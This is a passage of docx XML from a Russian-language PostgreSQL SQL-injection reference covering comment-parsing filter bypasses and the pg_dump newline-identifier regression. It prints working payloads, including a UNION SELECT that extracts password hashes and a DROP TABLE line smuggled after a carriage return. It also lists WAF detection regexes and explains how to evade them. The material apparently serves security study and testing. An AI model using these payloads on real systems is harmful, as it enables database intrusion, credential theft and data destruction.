        </w:rPr>
        <w:t xml:space="preserve">второй-порядка injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: точка ввода и точка execution разделены по времени и месту.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Структура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**3.12.1 Вложенные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 обход sanitizer-ов, которые ищут первый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закрытие комментария. PG имеет nested-aware parser с PG 7.4. Sanitizer на старых ModSecurity / самописных pre-processor-ах — non-nested-aware → разный view payload-а. Три payload-карточки.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3.12.2 `--` и CR/LF/CRLF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обход sanitizer-ов, нормализующих line-endings. PG считает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(CR) и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(LF) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">независимо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как terminator однострочного комментария. Если фильтр strip-ает только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ловит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целиком —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сам по себе проходит. Три payload-карточки.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3.12.3 Newline в идентификаторах (R25, CVE-2025-8715)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — second-order attack через pg_dump/pg_restore chain. Атакующий с правом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 создаёт объект с embedded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в имени; pg_dump кладёт имя в SQL-комментарий внутри dump-script; psql при restore видит ломанный комментарий и исполняет injected SQL — потенциально с client-side RCE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Регрессия CVE-2012-0868, исправлена в августе 2025.</w:t>
      </w:r>
    </w:p>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 vs 3.12.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.12.2 может комбинироваться с 3.5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--\rDROP TABLE users;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — первая команда обрывается newline в комментарии, вторая выполняется. Но 3.5-stacking блокируется extended-protocol в большинстве драйверов; 3.12.2 — про обход sanitizer-а до отправки на сервер. Граница: 3.5 — wire-protocol; 3.12.2 — application-уровень.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 (CTE-based) vs 3.12.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Не пересекаются. CTE — про write-effects через single-command; 3.12 — про парсер-комментариев.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vs 3.12.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.16 — серверная атака через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s', value)</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3.12.3 — client-side chain через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_dump-сериализацию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> quoted-identifier-ов с embedded newline. Разные точки в pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Привилегии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.12 преимущественно про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">доставку</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload-а через sanitizer/parser-edge cases, привилегии целевой роли определяются итоговой категорией атаки. Например, 3.12.1 поверх 3.7.1 (COPY FROM PROGRAM) требует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3.12.3 для setup требует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 на схеме, а активация — права DBA, запускающего dump/restore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код для 3.12.1/3.12.2 — общий с 3.9.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.1 и 3.12.2 используют ту же модель уязвимого кода, что и 3.9 — pattern-based WAF/sanitizer перед SQL-builder приложения (см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Specifically, фильтр из 3.9.0 содержит правило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 блокирует любые SQL-комментарии. 3.12.1 и 3.12.2 показывают, как обойти именно это правило через specific lexer-edge-cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для 3.12.3 (R25) уязвимый код — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_dump + pg_restore pipeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на стороне DBA/CI/CD, не application-эндпоинт. Описан отдельно в карточке 3.12.3.</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Comments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — спецификация комментариев, включая вложенность.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Identifiers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — quoted identifiers, character set.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CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — оригинальная уязвимость pg_dump.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CVE-2025-8715</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — регрессия 2025.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 comment-based filter bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.1 Вложенные `/* /* */ */`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">**Уязвимый код — см. 3.9.0 (общий WAF с правилом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PostgreSQL — один из немногих SQL-парсеров, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">корректно обрабатывает вложенность</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в block-комментариях </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* ... */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Из PostgreSQL Lexical Structure §4.1.5:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; *A nested block comment can be implemented by using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pairs. PostgreSQL allows this nesting; the comment ends at the matching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token, which is the one that pairs with the opening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То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* outer /* inner */ ... */</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один</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> комментарий (PG ищет matching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через counter, не первый встретившийся). Другие SQL-парсеры — MSSQL, sqlite, многие самописные SQL-pre-processor-ы — обрывают на первом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Это создаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">семантический gap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> между sanitizer и PG-парсером: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Sanitizer-non-nested-aware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.sub(r'/\*.*?\*/', '', payload)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — non-greedy: первый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первый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То, что после первого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это «текст после комментария», для sanitizer-а activated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PG-парсер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — nested-aware: первый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matching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 учётом вложенных). Всё между ними — комментарий, ничего не активируется.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий контролирует, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">именно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sanitizer пометит как комментарий vs что PG выкинет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — обход WAF `r"--|/\*"`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: WAF из 3.9.0 содержит правило </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bDROP|TRUNCATE|GRANT|CREATE|ALTER\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для DDL и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для любых SQL-комментариев. WAF блокирует payload, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">содержащий любой комментарий</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вообще. Атакующий хочет инжектировать SQL, не используя комментарий-маркер.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Но если разработчики ослабили правило до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">"запретить только полные комментарии"</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(Python re с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.DOTALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — payload с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">вложенной</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> структурой обходит:</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admin'/*outer/*inner*/' UNION SELECT id,email,password_hash FROM users--</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id, title, body FROM articles WHERE title = 'admin'/*outer/*inner*/' UNION SELECT id,email,password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer Python (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.sub(r'/\*.*?\*/', '', q, flags=re.DOTALL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non-greedy) видит:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'admin'/*outer/*inner*/' UNION SELECT id,email,password_hash FROM users--'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первый /* — здесь</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первый */ — здесь (за inner)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitizer удаляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/*outer/*inner*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (от первого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до первого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'admin'' UNION SELECT id,email,password_hash FROM users--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После удаления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(двойной апостроф = escaped quote) — sanitizer считает это «безопасный escape», пропускает. WAF не видит активного UNION-syntax после удаления, пропускает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
